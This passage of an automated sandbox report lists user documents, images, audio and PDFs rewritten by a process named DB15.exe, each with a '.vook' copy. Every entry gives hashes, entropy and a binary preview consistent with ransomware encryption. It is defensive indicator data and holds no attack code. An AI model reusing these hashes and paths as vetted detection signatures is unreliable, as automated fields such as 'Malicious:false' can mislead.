                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:65eJkXDVZsipQlWvTfCw8xFCsFZ0uXbILjv4V1ciyeV6X4ILrIa24QULXKspiTkX:65GiV2ivvTf7SQuE34V1ciyMjInn2BkT
                                                                                                                                                                                                                                      MD5:B98500197B3902389D62E8EA4AF06C14
                                                                                                                                                                                                                                      SHA1:1C1BBEAC7B8E9159FAD28BB750C75D109DAACE20
                                                                                                                                                                                                                                      SHA-256:09C5CBF9AE306D71E2157CD7B0A67A758B9036869DC0F588023DD7401127DD79
                                                                                                                                                                                                                                      SHA-512:6038BC6CDA493CDA89CA77DDEF42AB068300264EC7441B91DE2318AD1E4D10D9286CEDE53E040137E8217F35C0DBFDDCDFA281AFA8B2ECC36442E7699485B8A2
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:ZQIXM.....iA..Y^h.Z..j~."0.T...C.[d.TTl.3....dLWL.. .._........&w.o....Z...]Rk....X...S5.o.=...7....Q.......7....-...b..#...........$../m..c......1......P......R....v,..Pf..cW.Z.f#.|..:...[...F.;.....#....n=.ox.\.(......D.A9.[...F.vNl..7.+..0..G.8..252..B{.I)d.>....*.........U...............5@.^..f.)..W..^...Yh.h.&.K......\e; hp.&...............Jj.|..../h...\.rgv.5Wz.|kfd.?j@.}}..N..WEE8q<.(f.ip..FCR......F?(m.....T.C$.0...-.,.......bVQ...,.;.WA...T[...'...,31:.hCe....R`..U.>..;0.B....m..*B5........v.&.~...._5..D..G.\'..).r.<.......t*...y.P....`...pM'.p...Dz.W..p......s...t.~.../...0....j..c0r0B.iPh.l{..2a.q.*Z.w(.T.s...qkpIx...........|.5y>X.$.9.4...,..32...W..SG.b.Uo.7...[..A.?..k...&1..;..7...Z2.r/u.E.g/...~.u...!...N..G.(.a...T}n..;..aj....[P..n.A<SG..@EP.......CP6........V...V.4.A........\.3.w.i..+...>l.7.r.....q/.s750G.....G......a?...!...C.,.1K.~....N.UC...-....#.=<.\..O"..J..x...t.I.."..,.}Dy..........Yn.8*.dX%-...i

                                                                                                                                                                                                                                      C:\Users\user\Documents\UOOJJOZIRH\ZQIXMVQGAH.jpg.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.861975303358261
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:65eJkXDVZsipQlWvTfCw8xFCsFZ0uXbILjv4V1ciyeV6X4ILrIa24QULXKspiTkX:65GiV2ivvTf7SQuE34V1ciyMjInn2BkT
                                                                                                                                                                                                                                      MD5:B98500197B3902389D62E8EA4AF06C14
                                                                                                                                                                                                                                      SHA1:1C1BBEAC7B8E9159FAD28BB750C75D109DAACE20
                                                                                                                                                                                                                                      SHA-256:09C5CBF9AE306D71E2157CD7B0A67A758B9036869DC0F588023DD7401127DD79
                                                                                                                                                                                                                                      SHA-512:6038BC6CDA493CDA89CA77DDEF42AB068300264EC7441B91DE2318AD1E4D10D9286CEDE53E040137E8217F35C0DBFDDCDFA281AFA8B2ECC36442E7699485B8A2
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:ZQIXM.....iA..Y^h.Z..j~."0.T...C.[d.TTl.3....dLWL.. .._........&w.o....Z...]Rk....X...S5.o.=...7....Q.......7....-...b..#...........$../m..c......1......P......R....v,..Pf..cW.Z.f#.|..:...[...F.;.....#....n=.ox.\.(......D.A9.[...F.vNl..7.+..0..G.8..252..B{.I)d.>....*.........U...............5@.^..f.)..W..^...Yh.h.&.K......\e; hp.&...............Jj.|..../h...\.rgv.5Wz.|kfd.?j@.}}..N..WEE8q<.(f.ip..FCR......F?(m.....T.C$.0...-.,.......bVQ...,.;.WA...T[...'...,31:.hCe....R`..U.>..;0.B....m..*B5........v.&.~...._5..D..G.\'..).r.<.......t*...y.P....`...pM'.p...Dz.W..p......s...t.~.../...0....j..c0r0B.iPh.l{..2a.q.*Z.w(.T.s...qkpIx...........|.5y>X.$.9.4...,..32...W..SG.b.Uo.7...[..A.?..k...&1..;..7...Z2.r/u.E.g/...~.u...!...N..G.(.a...T}n..;..aj....[P..n.A<SG..@EP.......CP6........V...V.4.A........\.3.w.i..+...>l.7.r.....q/.s750G.....G......a?...!...C.,.1K.~....N.UC...-....#.=<.\..O"..J..x...t.I.."..,.}Dy..........Yn.8*.dX%-...i

                                                                                                                                                                                                                                      C:\Users\user\Documents\ZQIXMVQGAH.jpg

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.8469149590262
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:4Mh1Y9WYWXtiVwDLCBIP0+k6dHymcc9iFxy/wQJ54R20OJegsQaYFMPViTkbD:8sYWsVYf0AdH9orawQHjq3YFksiD
                                                                                                                                                                                                                                      MD5:60F10366C89165D430CA51263B0766FF
                                                                                                                                                                                                                                      SHA1:66059CB51110D2DA71881FC0CF6BB907C04D42BB
                                                                                                                                                                                                                                      SHA-256:5C6FCFC4C8019A2A02E172BCDAFF46A32F3A6224A3AA3694203BC282D5D6DCFC
                                                                                                                                                                                                                                      SHA-512:F847053681191066E77BC0058DCA3986094F48A7319C949F8DD5B2A01CC1B8969F1E97824D1C1337D7D4B0DC8EFB15D76BDC2BCDAF9E2E85D9603D372321F860
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:ZQIXM.M....v....T@.N|".....f.g..6.p..b......b...6.....J...Q(3.....v..\'..Rw(.@.D......._.Z..).D...A..K.....z.Mw..K4.=.2.U[.k.8..(...&...1>-.K3]r.........>.....-...<c.iA.N...98..<q..!F...}(G2.9.2U....-.8\..|...]8....7Xi..w...........%.(..S..._..r)..7.BE.w_.~....~2.b.K=...i.CM5om.."~..&m.XuK.t.C..B.*..:..\......+y.Q...X[.h........D.))...#.h..p.Z..L..0.....go|?.m$...|...Vl.'..D.l....4....R..1<{..)n...f+.......?..6.~..i...-X.4..g..%E_M.[.hkq.S`.%.6...`..Ey3^~.!..G.].;y).#.....,..-...P.... .y.J.[kx......N../..../O...k.Y.IL..&<..04......e.{<....Q?E...h.....w..{..o>i.T..>/3M99.a..g..B..Gl.{,........v.4.g.f..d...wQ...1(.5.t^D./......[.v..B.&...a...,..p.}...U.Iy6.mJ.E..|E...&Y(N.....+.lN...D...g.J..y.[..........d.2*Gbd/N.....`.*.&#u..~wN$.....aH...c. IwA./)w...l....:+..4O! .C.8..d....@.m.k.....H7..u.}...Q.g.,.m#..*...hY.........f.....RF..oz.......~.W.V;.l..*..DozQ..?....\.....H.DHH....;.8.!.Z..Um..{.h.y..I.i.[?W;...~.u5&.$..e...H)..G..=1.24..4..S.

                                                                                                                                                                                                                                      C:\Users\user\Documents\ZQIXMVQGAH.jpg.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.8469149590262
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:4Mh1Y9WYWXtiVwDLCBIP0+k6dHymcc9iFxy/wQJ54R20OJegsQaYFMPViTkbD:8sYWsVYf0AdH9orawQHjq3YFksiD
                                                                                                                                                                                                                                      MD5:60F10366C89165D430CA51263B0766FF
                                                                                                                                                                                                                                      SHA1:66059CB51110D2DA71881FC0CF6BB907C04D42BB
                                                                                                                                                                                                                                      SHA-256:5C6FCFC4C8019A2A02E172BCDAFF46A32F3A6224A3AA3694203BC282D5D6DCFC
                                                                                                                                                                                                                                      SHA-512:F847053681191066E77BC0058DCA3986094F48A7319C949F8DD5B2A01CC1B8969F1E97824D1C1337D7D4B0DC8EFB15D76BDC2BCDAF9E2E85D9603D372321F860
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:ZQIXM.M....v....T@.N|".....f.g..6.p..b......b...6.....J...Q(3.....v..\'..Rw(.@.D......._.Z..).D...A..K.....z.Mw..K4.=.2.U[.k.8..(...&...1>-.K3]r.........>.....-...<c.iA.N...98..<q..!F...}(G2.9.2U....-.8\..|...]8....7Xi..w...........%.(..S..._..r)..7.BE.w_.~....~2.b.K=...i.CM5om.."~..&m.XuK.t.C..B.*..:..\......+y.Q...X[.h........D.))...#.h..p.Z..L..0.....go|?.m$...|...Vl.'..D.l....4....R..1<{..)n...f+.......?..6.~..i...-X.4..g..%E_M.[.hkq.S`.%.6...`..Ey3^~.!..G.].;y).#.....,..-...P.... .y.J.[kx......N../..../O...k.Y.IL..&<..04......e.{<....Q?E...h.....w..{..o>i.T..>/3M99.a..g..B..Gl.{,........v.4.g.f..d...wQ...1(.5.t^D./......[.v..B.&...a...,..p.}...U.Iy6.mJ.E..|E...&Y(N.....+.lN...D...g.J..y.[..........d.2*Gbd/N.....`.*.&#u..~wN$.....aH...c. IwA./)w...l....:+..4O! .C.8..d....@.m.k.....H7..u.}...Q.g.,.m#..*...hY.........f.....RF..oz.......~.W.V;.l..*..DozQ..?....\.....H.DHH....;.8.!.Z..Um..{.h.y..I.i.[?W;...~.u5&.$..e...H)..G..=1.24..4..S.

                                                                                                                                                                                                                                      C:\Users\user\Documents\ZQIXMVQGAH.xlsx

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.850267810806193
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:cehSFW9CPMqL03ru2z+XiSV2T5pTUvc80mLITY5TJWtDxyvb8vRiTkbD:ceh8W1ru2SSSo1pT0c802I05TCxm8vwq
                                                                                                                                                                                                                                      MD5:383BD0D22CEED9B4FD555D4019C6757A
                                                                                                                                                                                                                                      SHA1:7069893CC7B8BCDA489D1C8F70BE526B8CBF54CB
                                                                                                                                                                                                                                      SHA-256:24C6C124CF0050DD4FA52AB3DCE887F30170A1573479EAF073FD6F08DEDD7C66
                                                                                                                                                                                                                                      SHA-512:E0F4B24B86CEE8D13D1778F4782D27467D76F5315B70448DE345E54007A3760E2C3E1DBE0AA5578E529BAC59894590B8231EAD1972061C3DF34CEED0FAF9A053
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:ZQIXMk.hAhO`......vt".'..j...)..e...Fb.......F,\:U...H.}(..~.N...............QC.=L.....C..I....I....h... %._B..../.g-[zM.........x'g..2....D.$.1....`w.lZ*.D...!...d..g.bm.Z.....W..kp.Q.W.C......+mVk..z)'.XR.6v.........q.7I=5..k..S.i[*o.,..T..E.nJ...}u|...b=jZ.$.k`...0...u%....d Vb..@..o..[.{......7.w..^.S.,..*1.<.S.n.n..~..=.J..R...?..........ln.`m.E.:........$.....;.Q.u@.9...ZJ...D.^=.E.<d..z.-=`.3....#.~.b..T.%I..z..).g.I...T.Q...(;;.e..''@n2d)..T.w.C.L}Ol...N..'h>.F.........D..H....m.G[.A... .....T..:.!.V.+..w.<.T..;).e...-.x..k......{.gU..7.....fDW.F....TQ.ZO..].u$=.3....0?.....I.".g..v,?...W.7*.tj!?.....q=./{...U.T.-..V..... ...cvq.S..S.......H...lo..Uh.s.I....xT.....X..v#...\JT+./....{..O.:.Y.Qz._.8.<.D5.t../.\v.....=_..:.n./Ji..........1...&}.;'..`w|pY.......Iew.I.@u(..[.^....n...x.r...p>....D`.u.u..........`..%..w.EM.?.p#.=.w.K..jA.}..M...cf..r.b......1..<T#.2.....:.......o...66O`..S.s.".}m7o8....c.52.ZWx;.....(...@|A< tm[_.|c..

                                                                                                                                                                                                                                      C:\Users\user\Documents\ZQIXMVQGAH.xlsx.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.850267810806193
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:cehSFW9CPMqL03ru2z+XiSV2T5pTUvc80mLITY5TJWtDxyvb8vRiTkbD:ceh8W1ru2SSSo1pT0c802I05TCxm8vwq
                                                                                                                                                                                                                                      MD5:383BD0D22CEED9B4FD555D4019C6757A
                                                                                                                                                                                                                                      SHA1:7069893CC7B8BCDA489D1C8F70BE526B8CBF54CB
                                                                                                                                                                                                                                      SHA-256:24C6C124CF0050DD4FA52AB3DCE887F30170A1573479EAF073FD6F08DEDD7C66
                                                                                                                                                                                                                                      SHA-512:E0F4B24B86CEE8D13D1778F4782D27467D76F5315B70448DE345E54007A3760E2C3E1DBE0AA5578E529BAC59894590B8231EAD1972061C3DF34CEED0FAF9A053
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:ZQIXMk.hAhO`......vt".'..j...)..e...Fb.......F,\:U...H.}(..~.N...............QC.=L.....C..I....I....h... %._B..../.g-[zM.........x'g..2....D.$.1....`w.lZ*.D...!...d..g.bm.Z.....W..kp.Q.W.C......+mVk..z)'.XR.6v.........q.7I=5..k..S.i[*o.,..T..E.nJ...}u|...b=jZ.$.k`...0...u%....d Vb..@..o..[.{......7.w..^.S.,..*1.<.S.n.n..~..=.J..R...?..........ln.`m.E.:........$.....;.Q.u@.9...ZJ...D.^=.E.<d..z.-=`.3....#.~.b..T.%I..z..).g.I...T.Q...(;;.e..''@n2d)..T.w.C.L}Ol...N..'h>.F.........D..H....m.G[.A... .....T..:.!.V.+..w.<.T..;).e...-.x..k......{.gU..7.....fDW.F....TQ.ZO..].u$=.3....0?.....I.".g..v,?...W.7*.tj!?.....q=./{...U.T.-..V..... ...cvq.S..S.......H...lo..Uh.s.I....xT.....X..v#...\JT+./....{..O.:.Y.Qz._.8.<.D5.t../.\v.....=_..:.n./Ji..........1...&}.;'..`w|pY.......Iew.I.@u(..[.^....n...x.r...p>....D`.u.u..........`..%..w.EM.?.p#.=.w.K..jA.}..M...cf..r.b......1..<T#.2.....:.......o...66O`..S.s.".}m7o8....c.52.ZWx;.....(...@|A< tm[_.|c..

                                                                                                                                                                                                                                      C:\Users\user\Downloads\BNAGMGSPLO.png

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.83622094103484
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:7EJSesarSAn6UxVZ5RR9kGWpXvAobW8w2ZAWCJ72wwFv+rviUPCd6l/iTkbD:oJ/svAn6MZ5R0fpXvAG5i1fwwDCdNiD
                                                                                                                                                                                                                                      MD5:A041252C58E068FB67EA3FFD3B2C30C2
                                                                                                                                                                                                                                      SHA1:0F53E91D05A7711C552A15A2AC13F5A5EDE69943
                                                                                                                                                                                                                                      SHA-256:FC470CAB49B1190FA92D9C3B9CBDF10543E5271F561B741BB41EDF6EE4A94474
                                                                                                                                                                                                                                      SHA-512:701058DDF1B2FB65081417B4C7B8C54EF3E3E99B6DCC29213EEA8830356C56EE35EEDFE6CE648FE0F7CB6DFCFC910E1397CEE107C625352F1BF5156DFB6F6A30
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:BNAGM3.w_ .SM..-g...@\k.3.[>..@2.U'.....E..0.......F..... z...c....,.........@....n..F.D...*..o.,.E.`.a.7X.%C.\SB.......|.m.w......ab..YL.B.<..e.........{.].....3.......K..\.W.y.G4.....%8.........lN...|.g.!...:+...uM.e.0.#....b.Q.gp.v2..M.'....=.0s.%.Ch5.,6Q.8..jP. ...p4x....l.o....m[4ehD...K.......M2.w...F.V)...l...;.......!..o(4G.4)J..6...';>q6.\.[#*."c.:.T'+v~8p.. .9..?.A.Y.U.\_....6,...../..05X.hd..N..\..z,"t..6.f...1.S.G....,..0....u......gN7X...+..G..S$..=F.....9?.w$.C.....#.X...-..I.c.L.h..,.).3.r.g #.....Q#0g1I..Y.... .C7.......\*.5LN.0.D.>dF8.U..~.w.....C..|l.....@......M%.....).^~..p...`.9......EU......)D.N.i..\O.W....."..3...7r...]..:.s..|......g.J.e.n..d-....[..Z...oDO...p.,*.G!.Ge.).....w...i{c,pG.\%..3...%.*....^`kd..nS. 1.d....t't.....[eLB....m..>.'.2....@.M=t%..MBkY.t..^,y..a$...+. [....UW..uy...........Q...DM.V..^2....>.........>/..P......E..,.._Q.......r.....=.=.vzm.j-,.a.......'.....u..bNdE-.....>7;4...le..

                                                                                                                                                                                                                                      C:\Users\user\Downloads\BNAGMGSPLO.png.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.83622094103484
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:7EJSesarSAn6UxVZ5RR9kGWpXvAobW8w2ZAWCJ72wwFv+rviUPCd6l/iTkbD:oJ/svAn6MZ5R0fpXvAG5i1fwwDCdNiD
                                                                                                                                                                                                                                      MD5:A041252C58E068FB67EA3FFD3B2C30C2
                                                                                                                                                                                                                                      SHA1:0F53E91D05A7711C552A15A2AC13F5A5EDE69943
                                                                                                                                                                                                                                      SHA-256:FC470CAB49B1190FA92D9C3B9CBDF10543E5271F561B741BB41EDF6EE4A94474
                                                                                                                                                                                                                                      SHA-512:701058DDF1B2FB65081417B4C7B8C54EF3E3E99B6DCC29213EEA8830356C56EE35EEDFE6CE648FE0F7CB6DFCFC910E1397CEE107C625352F1BF5156DFB6F6A30
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:BNAGM3.w_ .SM..-g...@\k.3.[>..@2.U'.....E..0.......F..... z...c....,.........@....n..F.D...*..o.,.E.`.a.7X.%C.\SB.......|.m.w......ab..YL.B.<..e.........{.].....3.......K..\.W.y.G4.....%8.........lN...|.g.!...:+...uM.e.0.#....b.Q.gp.v2..M.'....=.0s.%.Ch5.,6Q.8..jP. ...p4x....l.o....m[4ehD...K.......M2.w...F.V)...l...;.......!..o(4G.4)J..6...';>q6.\.[#*."c.:.T'+v~8p.. .9..?.A.Y.U.\_....6,...../..05X.hd..N..\..z,"t..6.f...1.S.G....,..0....u......gN7X...+..G..S$..=F.....9?.w$.C.....#.X...-..I.c.L.h..,.).3.r.g #.....Q#0g1I..Y.... .C7.......\*.5LN.0.D.>dF8.U..~.w.....C..|l.....@......M%.....).^~..p...`.9......EU......)D.N.i..\O.W....."..3...7r...]..:.s..|......g.J.e.n..d-....[..Z...oDO...p.,*.G!.Ge.).....w...i{c,pG.\%..3...%.*....^`kd..nS. 1.d....t't.....[eLB....m..>.'.2....@.M=t%..MBkY.t..^,y..a$...+. [....UW..uy...........Q...DM.V..^2....>.........>/..P......E..,.._Q.......r.....=.=.vzm.j-,.a.......'.....u..bNdE-.....>7;4...le..

                                                                                                                                                                                                                                      C:\Users\user\Downloads\EOWRVPQCCS.mp3

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.860283731299682
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:1JKtGRXA7FJBrhW6t7QGPkOJtQ/9hesaepwkv/FGRDiTkbD:18GFApLrhW6t7smtWa6NGR2iD
                                                                                                                                                                                                                                      MD5:23E88485630C6D10566FC7521759A24A
                                                                                                                                                                                                                                      SHA1:2A8B462891A99090E65222B962ED60075FAE5144
                                                                                                                                                                                                                                      SHA-256:72318B99B486ACF430FEF5447FDAB845EEA702271C8E6E7F041B69562DDC5967
                                                                                                                                                                                                                                      SHA-512:BCBCB88F9D947B679C33B0117A76C15AD5DEF94E2CD33CB52589E7EA230DC150DBB8F8B7387F6C24A1FC565B07D2FC2F4D0B8F3485C812231DF951BB5064016F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:EOWRV...2W.G8.V..+.`.. }.3Z).....^....-.....A".U.]..F.[..gWc.p.8K...E..z....#.3G.~....~....+..YOi.....w..d..+}O...J...J...)1Ll_...........$....(/..K. u3.d.....,....*/#..@H.%&X.....B....jZ..rh..*..oR...!..L...w..A..ef0V.......N...H.;.....i.6..C.4.........fi....7...sH.t#ue....M;.?.......i{..*..v.+.P.gIZ....3n..).$...0..k&.~*...w++..t.`vv....Gv.-.*...1......d,.&.J6.../!.......c<..._W..p5".H.......y.c.%3i.B.V{m2....\.v...Fk..n.)c..X.St......9.F.L..t...Rv'{Q%......1..;k_.,...;K.8..S]....H...*.+6._5=..`^.QV.J.@.?2*b.N/.R.e...9_..T|.....F.q|......P4.uC..f1..tD........{W...vY...5Z...Cp..}....2.?..$.&....a/.wc..a.B(2;+.h%...+.id......:.Cl]...x.( ../.S....G@,.k.H.r.4.P./A..e..._u....9Vm.....$..c.:...,Q.........J.?..~k.k3x...#,.@...&W1).rm...aMb...+.;<..y...........-...2....]......vh/6. ..rN.z..}...+:p.qZ..c........Dv>v...../ .G.L..1P.~.&.....\F.J.7u.ps.2..mP.}.....A......^..s.W...-EF?.,.Gu.8.1b.&C.<...H.egEc.&H.%d..:.....-.....pO.p..`_..Dq.......

                                                                                                                                                                                                                                      C:\Users\user\Downloads\EOWRVPQCCS.mp3.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.860283731299682
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:1JKtGRXA7FJBrhW6t7QGPkOJtQ/9hesaepwkv/FGRDiTkbD:18GFApLrhW6t7smtWa6NGR2iD
                                                                                                                                                                                                                                      MD5:23E88485630C6D10566FC7521759A24A
                                                                                                                                                                                                                                      SHA1:2A8B462891A99090E65222B962ED60075FAE5144
                                                                                                                                                                                                                                      SHA-256:72318B99B486ACF430FEF5447FDAB845EEA702271C8E6E7F041B69562DDC5967
                                                                                                                                                                                                                                      SHA-512:BCBCB88F9D947B679C33B0117A76C15AD5DEF94E2CD33CB52589E7EA230DC150DBB8F8B7387F6C24A1FC565B07D2FC2F4D0B8F3485C812231DF951BB5064016F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:EOWRV...2W.G8.V..+.`.. }.3Z).....^....-.....A".U.]..F.[..gWc.p.8K...E..z....#.3G.~....~....+..YOi.....w..d..+}O...J...J...)1Ll_...........$....(/..K. u3.d.....,....*/#..@H.%&X.....B....jZ..rh..*..oR...!..L...w..A..ef0V.......N...H.;.....i.6..C.4.........fi....7...sH.t#ue....M;.?.......i{..*..v.+.P.gIZ....3n..).$...0..k&.~*...w++..t.`vv....Gv.-.*...1......d,.&.J6.../!.......c<..._W..p5".H.......y.c.%3i.B.V{m2....\.v...Fk..n.)c..X.St......9.F.L..t...Rv'{Q%......1..;k_.,...;K.8..S]....H...*.+6._5=..`^.QV.J.@.?2*b.N/.R.e...9_..T|.....F.q|......P4.uC..f1..tD........{W...vY...5Z...Cp..}....2.?..$.&....a/.wc..a.B(2;+.h%...+.id......:.Cl]...x.( ../.S....G@,.k.H.r.4.P./A..e..._u....9Vm.....$..c.:...,Q.........J.?..~k.k3x...#,.@...&W1).rm...aMb...+.;<..y...........-...2....]......vh/6. ..rN.z..}...+:p.qZ..c........Dv>v...../ .G.L..1P.~.&.....\F.J.7u.ps.2..mP.}.....A......^..s.W...-EF?.,.Gu.8.1b.&C.<...H.egEc.&H.%d..:.....-.....pO.p..`_..Dq.......

                                                                                                                                                                                                                                      C:\Users\user\Downloads\GAOBCVIQIJ.pdf

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.8504943887622005
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:syh8P4Ep8+gd0FAlRUOtW2FafOIRv7faGM9YQL2iTkbD:sNPK+gyqCsFleaGJUziD
                                                                                                                                                                                                                                      MD5:F6619A18AC0B8CD51445D00F2BF6EB47
                                                                                                                                                                                                                                      SHA1:BBD60B25D407AA3F734B697A21E922C4BAD4C38A
                                                                                                                                                                                                                                      SHA-256:7A82E981F9700EC074DFA7F5DA1B1383B4A05EB818916CCD15CDBAE0D69C22DC
                                                                                                                                                                                                                                      SHA-512:99F5EA7F74E82D04DED47CD8485F54F48E7E5979DDF6F1617DFA4339944FF7AD2F2ED22CC3B90637E774161B238E26C89887A2265210ABB0316C985586392A84
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:GAOBCA./.ir..E.D..].i...b.7.R....._.]...`....q..\7DM..R..7..t..p[..h..IWj..n}...U.\.'...g..7..F.a.d.>.0..3B...*..@.7)...wh..m ...uI5f.lB..a2..[.._.E~......x.}&O.,4mY.d...@.N....l)......5..b.j...7.#.8.*.91.nQ.n..>>\O.A6.U.K.......TD.>#.xx..Gi.L..y?..i."9......N..f..Y...K...-.G.]..S.........*..-...4...Uc?*.xl..:..?.P.(.".>P......b.k..T..j.3..N{e... ......A.U{........]X.c.sk......ceD>..|.z.2...c.......`i..$$.V....47./kz.....{Y.q0..;.4FU.:p@.HqX."..4....T..X.{...#...C..$.#.....x...o...=.V.dx.]?...|..S........Ta...V.......b.......D..........Sl.... W..'..G....v...j-...........I4.$....q.D...sx..f..M..*.7_..W.JL...lP"c.3.X.. %.?..y...P..M..r4:....*.B.sVA.h.+p.b.|.S........9l..&`.`..]@...Kn..O.uJT..oC...4....6.Q..6"....?......-...X.tg....G..J.kdj._.."..P{.>........f...h.o..b&ni;f.LR.R<<0....@.C.1=.>........t......m.=0..?.).......Hnj.=.Ofkhi....7p%...Z...q..7y..,......L..iy.......W....<../2..,&..%k.W....%w;o.......T....O^.B..n.0...1j..s*..:....a.-./j...@f.

                                                                                                                                                                                                                                      C:\Users\user\Downloads\GAOBCVIQIJ.pdf.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.8504943887622005
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:syh8P4Ep8+gd0FAlRUOtW2FafOIRv7faGM9YQL2iTkbD:sNPK+gyqCsFleaGJUziD
                                                                                                                                                                                                                                      MD5:F6619A18AC0B8CD51445D00F2BF6EB47
                                                                                                                                                                                                                                      SHA1:BBD60B25D407AA3F734B697A21E922C4BAD4C38A
                                                                                                                                                                                                                                      SHA-256:7A82E981F9700EC074DFA7F5DA1B1383B4A05EB818916CCD15CDBAE0D69C22DC
                                                                                                                                                                                                                                      SHA-512:99F5EA7F74E82D04DED47CD8485F54F48E7E5979DDF6F1617DFA4339944FF7AD2F2ED22CC3B90637E774161B238E26C89887A2265210ABB0316C985586392A84
                                                                                                                                                                                                                                      Malicious:false
